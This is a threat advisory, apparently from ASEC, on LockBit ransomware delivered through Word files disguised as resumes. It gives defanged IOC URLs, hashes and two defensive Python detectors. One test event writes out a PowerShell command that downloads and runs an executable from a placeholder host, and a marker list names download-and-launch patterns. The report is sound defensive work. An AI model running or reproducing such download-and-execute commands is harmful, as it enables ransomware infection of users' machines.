AhnLab SEcurity intelligence Center (ASEC) has identified that LockBit ransomware has been distributed via Word files since last month. Notably, LockBit ransomware is usually distributed disguised as resumes, and the recently found malicious Word files were also disguised as resumes [1]. The method of distributing LockBit ransomware through external URLs embedded in Word files was first found in 2022 [2]. The file names of the recently discovered malicious Word files are as follows.
File name
- [[[231227_Yang**]]].docx
- 231227_Lee**.docx
- 231227Yu**,docx
- Kim**.docx
- SeonWoo**.docx
- Working meticulously! A leader in communication!.docx
- Candidate with a kind attitude and a big smile.docx
- I will work with an enthusiastic attitude.docx
An external link is included in \word\_rels\settings.xml.rels inside the Word file, and a document file containing additional malicious macro code is downloaded from that external URL when the Word file is opened. Most properties of these documents were similar to those of documents distributed in the past, so it is assumed that the documents used in the past are being reused.
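One way to check a .docx for the external template link described above, as an added example that is not part of the original post or ASEC's tooling: the function opens the Office Open XML package, reads word/_rels/settings.xml.rels and reports every relationship whose TargetMode is External, marking those of the attachedTemplate type, which Word resolves when the document is opened. The build_sample_docx helper constructs a minimal package in memory for testing; the URL it uses is a placeholder, not one of the URLs from the post.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Relationship namespace used by Office Open XML package parts (*.rels).
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship type of a template attached to a Word document (w:attachedTemplate).
ATTACHED_TEMPLATE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# The part the post names as carrying the external link.
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def find_external_template_links(docx_bytes: bytes) -> List[Dict[str, object]]:
    """Return every relationship in word/_rels/settings.xml.rels whose TargetMode
    is External, i.e. a target Word would fetch from a URL when the document is
    opened. An empty list means there is nothing to flag in that part."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.findall(f"{{{PKG_REL_NS}}}Relationship"):
            if rel.get("TargetMode", "Internal").lower() != "external":
                continue
            rel_type = rel.get("Type", "")
            findings.append({
                "id": rel.get("Id"),
                "type": rel_type.rsplit("/", 1)[-1],  # short name, e.g. attachedTemplate
                "target": rel.get("Target"),
                "is_attached_template": rel_type == ATTACHED_TEMPLATE_TYPE,
            })
    return findings


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Constructed minimal .docx package (not a sample from the post). When
    template_url is given, settings.xml references an attached template whose
    relationship points at that external URL, mirroring the layout the post
    describes; with None the package is clean."""
    settings_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        + ('<w:attachedTemplate r:id="rId1"/>' if template_url else "")
        + "</w:settings>"
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        + (
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_TYPE}" '
            f'Target="{template_url}" TargetMode="External"/>'
            if template_url else ""
        )
        + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr(SETTINGS_RELS, rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder URL; the post's own URLs are listed in its IOC section.
    suspicious = build_sample_docx("https://example.invalid/b/template.dotm")
    for hit in find_external_template_links(suspicious):
        print(f"external template link: {hit['id']} -> {hit['target']}")
    print("clean document:", find_external_template_links(build_sample_docx(None)))
```

Other .rels parts (word/_rels/document.xml.rels in particular) also carry External targets, but ordinary hyperlinks live there and are benign, so scanning only settings.xml.rels for an attached template keeps the check low-noise for mail-gateway or sandbox triage.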
As shown in the figure below, the file contains images prompting the user to run the malicious VBA macro. When the macro is run, the VBA macro included in the document file downloaded from the external URL is executed.
The identified external URLs are as follows.
- hxxps://viviendas8[.]com/bb/qhrx1h.dotm
- hxxps://learndash.825testsites[.]com/b/fgi5k8.dotm
- hxxps://neverlandserver.nn[.]pe/b/ck0zcn.dotm
The image below shows the macro code that is run via the downloaded document files. It is obfuscated in a manner similar to the VBA macro cases identified in 2022, and PowerShell is ultimately run to download and execute the LockBit ransomware.
The identified download URLs of the LockBit ransomware are as follows.
- hxxps://learndash.825testsites[.]com/b/abc.exe
- hxxps://viviendas8[.]com/bb/abc.exe
- hxxps://neverlandserver.nn[.]pe/b/abc.exe
When the downloaded LockBit 3.0 ransomware is executed, it encrypts the files on the user's PC.
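The chain described above (a Word macro launching PowerShell, which downloads and runs an executable) is what a process-creation detection rule keys on. The following triage function is an added example, not code from the post or from ASEC; it scores constructed process-creation events (the field names, paths, placeholder URL and command lines are assumptions, not telemetry from the post) on two signals: an Office parent spawning a shell, and download-and-launch markers in the command line.

```python
from typing import Dict, List

# Office processes that should rarely launch a shell on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Substrings typical of a download-and-run PowerShell stage (matched case-insensitively).
DOWNLOAD_MARKERS = (
    "downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
    "net.webclient", "start-process", "-encodedcommand", " -enc ",
)


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event. Returns 'alert', 'severity' and the
    list of 'reasons' so a caller can route, enrich or suppress it."""
    parent = basename(ev.get("parent_image", ""))
    child = basename(ev.get("image", ""))
    cmd = ev.get("command_line", "").lower()
    reasons: List[str] = []
    if parent in OFFICE_PARENTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    markers = [m.strip() for m in DOWNLOAD_MARKERS if m in cmd]
    if markers:
        reasons.append("download/launch markers: " + ", ".join(markers))
    if len(reasons) == 2:
        severity = "high"      # both signals: Office -> shell -> fetch-and-run
    elif reasons:
        severity = "medium"    # one signal: worth a look, often benign admin use
    else:
        severity = "none"
    return {"alert": bool(reasons), "severity": severity, "reasons": reasons}


def triage_all(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [triage_event(e) for e in events]


# Constructed sample events (assumed field layout; not telemetry from the post).
SAMPLE_EVENTS = [
    {   # macro-driven stage: Word spawns PowerShell that fetches and starts a binary
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('
                        "'https://example.invalid/b/abc.exe','C:\\Users\\Public\\abc.exe'); "
                        'Start-Process C:\\Users\\Public\\abc.exe"',
    },
    {   # benign: an admin script launched from Explorer
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1",
    },
    {   # benign: Word's print helper, a normal child of WINWORD.EXE
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\splwow64.exe",
        "command_line": "splwow64.exe 12288",
    },
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(basename(ev["parent_image"]), "->", basename(ev["image"]), verdict)
```

Only the first event scores high; the Explorer-launched script and Word's print helper produce no alert, which is the point of requiring the parent/child pair rather than alerting on every PowerShell start or every child of Word.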
As various kinds of malware other than LockBit ransomware are also being distributed under the guise of resumes, users are advised to be extra cautious.
[File Detection]
Downloader/DOC.Macro (2023.12.29.03)
Downloader/DOC.Agent (2024.01.02.03)
Downloader/XML.Exernal (2024.01.09.00)
Malware/Win.AGEN.R417906 (2021.04.27.03)
Trojan/Win.Generic.R629778 (2023.12.30.01)
Ransomware/Win.LockBit.XM170 (2023.10.05.02)
[Behavior Detection]
Ransom/MDP.Event.M4194
[IOC Info]
– DOCX –
fad3e205ac4613629fbcdc428ce456e5
6424cc2085165d8b5b7b06d5aaddca9a
1b95af49b05953920dbfe8b042db9285
11a65e914f9bed73946f057f6e6aa347
60684527583c5bb17dcaad1eeb701434
61fda72ff72cdc39c4b4df0e9c099293
16814dffbcaf12ccb579d5c59e151d16
9f80a3584dd2c3c44b307f0c0a6ca1e6
– DOTM –
f2a9bc0e23f6ad044cb7c835826fa8fe
4df66a06d2f1b52ab30422cbee2a4356
26b629643be8739c4646db48ff4ed4af
– EXE –
7a83a738db05418c0ae6795b317a45f9
bcf0e5d50839268ab93d1210cf08fa37
ab98774aefe47c2b585ac1f9feee0f19
– URL –
hxxps://viviendas8[.]com/bb/qhrx1h.dotm
hxxps://learndash.825testsites[.]com/b/fgi5k8.dotm
hxxps://neverlandserver.nn[.]pe/b/ck0zcn.dotm
hxxps://learndash.825testsites[.]com/b/abc.exe
hxxps://viviendas8[.]com/bb/abc.exe
hxxps://neverlandserver.nn[.]pe/b/abc.exe
Originally published by ASEC: LockBit Ransomware Distributed via Word Files Disguised as Resumes